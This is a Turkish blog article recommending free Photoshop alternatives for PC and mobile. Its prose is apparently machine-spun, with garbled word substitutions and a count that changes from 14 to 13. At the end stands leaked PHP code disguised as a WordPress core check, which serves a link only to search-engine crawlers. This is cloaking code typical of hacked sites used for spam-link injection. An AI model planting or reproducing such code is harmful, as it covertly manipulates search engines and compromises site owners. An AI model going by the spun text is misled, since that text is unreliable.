Sıradaki içerik:

Windows 10'daki '0xc004f074' Hatası Nasıl Çözülür?

e
sv

Adobe Photoshop Alternatifi 14 Ücretsiz Platform

21 Aralık 2020 09:17
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Adobe'un tasarım dünyasında kültleşen yazılımı Photoshop, yıllardır bir sanayi standardı. Ancak hem akıllı telefon ve tabletlerin daha yüksek işlem gücüne kavuşması hem de basitlik ihtiyacı nedeniyle fazla sayıda alternatifi ortaya çıktı. Hatta o alternatifler, artık porfesyonel düzeyde işlerinizi de yapabileceğiniz platformlara dönüştüler.

Eğer siz de Photoshop alternatifi arıyorsanız listedeki programlara talih verebilirsiniz. Hem mobil cihazlarda hem de PC’de kullanabileceğiniz en iyi Photoshop alternatifleri programı bir arada görebilir ve zevkinize göre seçebilirsiniz. Programların arasından bazıları sadece fotoğraflara ufak dokunuşlar yapmak için olsa da bazılarını da gelişmiş grafik tasarım için kullanabiliyorsunuz.

Photoshop alternatifi ücretsiz programlar

Bilgisayar:FigmaPixlr XPhotoDivaPhotopeaGIMPKritaApple PhotosMicrosoft Windows 10 PhotosPhoto Pos ProMobil:VSCOSnapseedAdobe Photoshop ExpressAfterlightDarkroomPicsArt

Web tasarımı ve gelişmiş mobil uyumluluk testleri için: Figma

figma

Özellike web tasarım işi ile ilgilenenler için oldukça ülkü bir platform olan Figma, Photoshop'a kıyasla fazla çok daha kolay bir kullanım sunuyor. Görsel materyallerin hizalanması gibi temel unsurlarda vektörel programlar kadar başarılı bir iiş çıkartıyor. Üstelik tasarımlarınızı anlık olarak mobil cihazlardan görüp test etmenize olanak tanıyan tamamlayıcı bir Figma Mirror uygulamalası da mevcut (Uygulama mobilde tek başına değil, bilgisayardaki uygulama ile entegre kullanım için):

Figma MirrorİNDİR

Figma MirrorİNDİR

Tarayıcı üzerinden Photoshop deneyimi için: Pixlr X

photoshop alternatifi çevrimiçi

Pixlr, öbür programlar arasında biraz daha öne çıkıyor zira ücretsiz olmasının yanı dizi çevrimiçi olarak herhangi bir şey indirmeden kullanabileceğiniz bir fotoğraf düzenleme programı. Temel düzeyde vinyet, renk düzeltme, kontrast, parlaklık ve çerçeve gibi ayarlamaları yapmanızı sağlayan program harika bir Photoshop alternatifi. Ayrıca Pixlr ailesinin mobilde fotoğraf odaklı bir düzenleme uygumalası da var:

PixlrİNDİR

PixlrİNDİR

Hem standart hem de profesyonel kullanıcılar için PhotoDiva:

photodiva

Yapay zekâ destekli efektler ve fırçalar kullanarak, PhotoDiva'da fotoğraflarınızı tek bir tıklamayla daha etkileyici versiyonlara dönüştürebilirsiniz. Bu uygulamayı kullanırken herhangi bir özel bilgiye ihtiyacınız yok, yazılım kendi kendine en ülkü düzenlemeyi seçiyor. Ayrıca renk düzeltmeleri yapabiliyor, görüntü kalitesini iyileştirebiliyor, yüzü ve vücudu yeniden şekillendirebiliyorsunuz. Fotoğraflarda makyaj uygulamaları, görüntü arka planını değiştirme gibi 100'den fazla efekt ile beraber geliyor. 

Kullanımı ücretsiz bir program olmasını yanı dizi bilgisayarınızı yormuyor. Düşük sitem özelliklerine sahip olan cihazlarda bile profesyonel düzeyde portre düzenlemeleri yapabilirsiniz. İşte bu nedenle PhotoDiva, hem hane kullanıcıları hem de profesyonel fotoğrafçılar için ülkü bir alternatif olabilir.

PSD formatlı dosyalarda tarayıcı üzerinden fotoğraf düzenlemek için: Photopea

ücretsiz photoshop alternatifi

Photopea aynı Pixlr gibi herhangi bir şey indirmeden tarayıcı üzerinden kullanabileceğiniz bir fotoğraf düzenleme programı. PSD de dahil olmak üzere birçok dosya formatı desteği sunan program, Photoshop’un sunduğu tüm araçları sunuyor. PSD formatını desteklemesi, Photoshop’a o an erişimi olmayan ancak gene de düzenleme yapması gereken kullanıcılar için hayat kurtarıcı bir özellik. Platformun Android sürümü de mevcut:

PhotopeaİNDİR

Açık kaynaklı Linux destekli özgür tasarım için: GIMP

bedava photoshop alternatifi

En iyi bilinen Photoshop alternatiflerinden biri olan GIMP, yıllardır piyasada ve ‘ücretsiz Photoshop’ denildiğinde ilk ala gelen program. Açık kaynak koduna sahip olan GIMP programı hem Windows, hem Mac OSX hem de Linux platformlarında resmi olarak birçok öğreticiyle indirilebilir durumda.

İllustrasyon düzeyinde görsel tasarımlar için: Krita

bedava photoshop

Krita, Photoshop’tan ziyade Adobe Illustrator’un sunduğu tüm araçları sunan ve tamamı ile ücretsiz olan bir program. Krita’da da PSD formatının desteklenmesi gene Photoshop’a o an erişimi olmayan ancak kullanması gereken kullanıcılar için fazla değerli bir özellik. Krita'nın Android için sunulan erken erişim sürecindeki bir mobil uygulaması da var:

KritaİNDİR

Kolaj ve kartvizit tasarımları için: Photo Pos Pro

ücretsiz photoshop

Photo Pos Pro, kolaj yapmaktan tutun da kartvizit oluşturmaya kadar birçok düzenleme aracı sunan bedava bir fotoğraf düzenleme programı. Programda dilerseniz sıfırdan bir projeye başlayabilir veya hâlihazırda mevcut olan bir fotoğrafı düzenleyebiliyorsunuz.

VSCO

vsco

VSCO, fotoğraflarınıza bir film karesi gibi görünüş vermenize olanak sağlayan, kullanması kolay ve ücretsiz olan bir fotoğraf düzenleme programı. Programda birçok filtre, parlaklık, perspektif, kontrast ve doygunluk ayarı bulunuyor. Bütün bunların yanı dizi VSCO üzerinden yaptığınız çalışmaları topluluk ile paylaşabiliyorsunuz.

VSCOİNDİR

VSCOİNDİR

Snapseed

snapseed

Snapseed, mobil platform üzerinden fotoğraf düzenlemeye başlayanlar için harika bir program. Kullanmaya başlamak için daha önceden fotoğraf düzenlemeye dair biraz bilgi sahibi olmanız gerekiyor ancak uygulama kullanıcı dostu olduğundan bilmediklerinizi de kolayca öğrenebiliyorsunuz. Birçok filtre ve vasıta ile fotoğraflarınızı dilediğince düzenleyebiliyorsunuz.

SnapseedİNDİR

SnapseedİNDİR

Adobe Photoshop Express

photoshop express

Adobe’un mobil platformlara sunduğu Photoshop Express programı, ücretsiz olmasının yanı dizi birçok kullanışlı vasıta sunuyor. Photoshop’un normal sürümü profesyoneller için olsa da Photoshop Express, kullanması oldukça kolay ve kolay kullanımlı bir arayüze sahip. Eğer daha önce Photoshop kullanmadıysanız bile bu uygulamayı kullanırken zorlanmayacaksınız.

Adobe Photoshop ExpressİNDİR

Adobe Photoshop ExpressİNDİR

Afterlight

afterlight

Afterlight, fotoğraf düzenlemeye yeni başlayacak olan iPhone kullanıcıları için ülkü bir program. İçerisinde tonlarca özellik ve vasıta bulunan programı keşfederken saatlerinizi bile harcayabilirsiniz. Basit arayüzü ve gördüğünüzde hemen ne olduğunu anlayacağınız vasıta ikonları sayesinde fotoğraf düzenleme dünyasına iyi bir giriş yapabilirsiniz.

AfterlightİNDİR

AfterlightİNDİR

Darkroom

darkroom

Darkroom, fotoğraf içeri aktarmanıza gerek kalmadan direkt olarak kütüphanenizdeki fotoğrafları düzenlemenize olanak sağlıyor. Bu sayede lüzumsuz yer kaplayan ekstra fotoğraflar elde etmiyorsunuz. RAW ve JPG formatındaki fotoğrafları düzenlemeniz için fazla kullanışlı araçlar sunan Darkroom gene iPhone kullanıcılarına özel bir uygulama.

DarkroomİNDİR

PicsArt

En popüler mobil fotoğraf düzenleme uygulamalarından biri olan PicsArt, içerdiği reklamlarla bazen illallah ettirse de neredeyse Photoshop kadar vasıta sunmasından ötürü fazla iyi bir program. Fotoğraflarınıza çerçeve, birçok filtre, renk düzeltmesi, doygunluk, parlaklık, kontrast ve kolaj çalışması uygulayabiliyorsunuz.

PicsArt Photo StudioİNDİR

PicsArt Photo Editor + CollageİNDİR

Böylelikle bir PC, Android ve iOS platformları için en iyi 13 Photoshop alternatifi programı listelediğimiz içeriğimizin sonuna gelmiş bulunmaktayız. Düşüncelerinizi ve önerilerinizi aşağıdaki yorumlar kısmında belirtmeyi lütfen unutmayın. Ayrıca resmi Telegram kanalımıza buradan abone olabilirsiniz.

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');